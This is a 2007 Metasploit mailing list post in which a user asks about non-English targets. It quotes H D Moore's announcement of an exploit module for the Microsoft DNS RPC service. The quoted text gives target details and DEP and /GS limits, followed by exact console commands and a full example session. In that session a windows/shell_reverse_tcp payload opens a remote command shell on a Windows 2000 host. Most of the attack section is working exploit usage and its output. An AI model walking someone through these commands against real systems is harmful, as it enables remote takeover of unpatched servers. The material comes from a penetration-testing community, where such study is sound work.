Metasploit mailing list archives
Exploiting the Microsoft DNS RPC service
From: giorgio.casali at gmail.com (Giorgio Casali)
Date: Tue, 17 Apr 2007 17:11:55 +0200
Hi, is it possible to have it for the Italian version? Thanks

2007/4/16, H D Moore <hdm at metasploit.com>:
> The exploit module has been merged to stable, use 'Online Update' or 'svn update' to grab it. The module's default target will exploit Windows 2000 SP0-SP4 and Windows 2003 SP0-SP2. All targets are designed for the English locale. If you have a non-English system, submit targets.
>
> The Windows 2003 SP0 target may not be reliable. The Windows 2003 SP1-SP2 targets will only work if hardware DEP is not in use. We use the SEH overwrite method for all targets and the /GS stack prevention means we will not be able to use standard hardware DEP bypass techniques (return to NTDLL to disable NX).
>
> The RPORT option defaults to '0' and will contact the endpoint mapper of the target system in order to determine the real RPC port at runtime. This saves a step, but it does mean that one of port 135 or 593 needs to be accessible on the target. If you are attacking a system with only ports > 1025 allowed through the firewall, you will need to locate the RPC service and set RPORT manually.
>
> To use the module, open the console interface, and run:
>
> msf> use exploit/windows/dcerpc/msdns_zonename
> msf exploit(msdns_zonename) >
> msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
> msf exploit(msdns_zonename) > set <payload options>
> msf exploit(msdns_zonename) > set RHOST <target>
> msf exploit(msdns_zonename) > exploit
>
> -- example --
>
>                 < metasploit >
>                  ------------
>                         \   ,__,
>                          \  (oo)____
>                             (__)    )\
>                                ||--|| *
>
>        =[ msf v3.0
> + -- --=[ 184 exploits - 104 payloads
> + -- --=[ 17 encoders - 5 nops
>        =[ 33 aux
>
> msf > use exploit/windows/dcerpc/msdns_zonename
> msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
> PAYLOAD => windows/shell_reverse_tcp
> msf exploit(msdns_zonename) > set LHOST 192.168.0.127
> LHOST => 192.168.0.127
> msf exploit(msdns_zonename) > set LPORT 4444
> LPORT => 4444
> msf exploit(msdns_zonename) > set RHOST 172.16.233.128
> RHOST => 172.16.233.128
> msf exploit(msdns_zonename) > exploit
> [*] Started reverse handler
> [*] Connecting to the endpoint mapper service...
> [*] Discovered Microsoft DNS Server RPC service on port 1356
> [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
> [*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128 [0] ...
> [*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128 [0] ...
> [*] Sending exploit...
> [*] Error: no response from dcerpc service
> [*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:45196)
>
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-2000 Microsoft Corp.
>
> c:\>